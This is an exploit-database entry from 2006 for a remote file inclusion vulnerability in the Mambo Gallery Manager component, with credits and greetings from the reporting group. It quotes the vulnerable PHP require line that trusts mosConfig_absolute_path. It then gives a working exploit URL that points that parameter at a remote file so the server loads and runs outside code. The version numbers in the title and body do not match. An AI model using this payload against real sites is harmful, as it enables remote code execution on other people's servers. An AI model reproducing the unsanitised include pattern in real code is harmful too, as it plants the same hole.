Mambo MGM Component <= 0.95r2 Remote Inclusion Vulnerability

2006-07-28T00:00:00
ID 1337DAY-ID-614
Type zdt
Reporter A-S-T TEAM
Modified 2006-07-28T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ============================================================
Mambo MGM Component <= 0.95r2 Remote Inclusion Vulnerability
============================================================



----------------------------------------------------
Mambo Gallery Manager v095.r3 Remote File Inclusion Vulnerabilities
----------------------------------------------------
Discovered By A-S-T TEAM
WE ARE CrAsH_oVeR_rIdE & BLACK-CODE & MR-HCR
----------------------------------------------------
Vulnerable: Mambo Gallery Manager v095.r3(mgm)
----------------------------------------------------
vulnerable file :
------------------
help.mgm.php
----------------------------------------------------
vulnerable code:
----------------------------------------------------
require $mosConfig_absolute_path .
"/administrator/components/com_mgm/diagnostics.mgm.php";
$mosConfig_absolute_path File inclusion
----------------------------------------------------
Exploit:
http://www.example.com/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://evalcode.txt
----------------------------------------------------------------------------------------------------
Discovered By A-S-T TEAM
Site:www.lezr.com
Greetz:KING-HACKER,YOUNG_HACKER,SIMO64,ROOT-HACKED,SAUDI,QPTAN,POWERWALL,SNIPER_SA,ALMOKAN3,Broken-proxy,troq AND ALL LEZR.COM Member



#  0day.today [2018-02-16]  #